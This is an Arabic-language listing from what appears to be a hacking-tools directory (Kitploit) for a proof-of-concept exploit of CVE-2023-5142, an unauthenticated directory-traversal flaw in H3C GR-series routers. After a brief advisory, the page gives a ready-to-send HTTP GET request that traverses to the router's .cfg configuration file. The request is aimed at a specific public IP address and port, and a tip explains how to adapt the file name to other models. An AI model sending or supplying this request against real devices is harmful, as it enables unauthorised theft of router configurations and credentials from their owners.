Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-H3C-Report — استغلال PoC لثغرة CVE-2023-5142 التي تستهدف أجهزة توجيه H3C GR عبر ثغرة اجتياز الدليل غير المصادق عليها لاستخراج ملفات الإعدادات الحساسة. | Kitploit
أدوات/GitHubGitHub/kuangxiaotu/cve-h3c-report
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتسوء التكوين
GitHubkuangxiaotu/cve-h3c-report

CVE-H3C-Report

استغلال PoC لثغرة CVE-2023-5142 التي تستهدف أجهزة توجيه H3C GR عبر ثغرة اجتياز الدليل غير المصادق عليها لاستخراج ملفات الإعدادات الحساسة.

عرض المستودع
24منذ 3 سنواتلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

سلسلة موجهات H3C GR تحتوي ثغرة وصول غير مصرح به في إدارة النظام

المنتج: موجه سلسلة GR

الإصدار: الكل

التصنيف: عالي الخطورة

الموقع: http://www.h3c.com/

المخاطر: يمكن للمهاجمين استغلال هذه الثغرة للحصول على معلومات حساسة من الموجهات من خلال بناء حزم طلبات خاصة لتجاوز التحقق من الهوية.

المبدأ: لم يقم الموجه بمصادقة الوصول إلى الدليل والملفات ذات الصلة

الاستغلال:

ملاحظة: من الضروري تعديل لاحقة اسم الملف في الاستغلال، مثل GR8300.cfg

root@kitploit:~
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image

image

image

تنزيل الأداة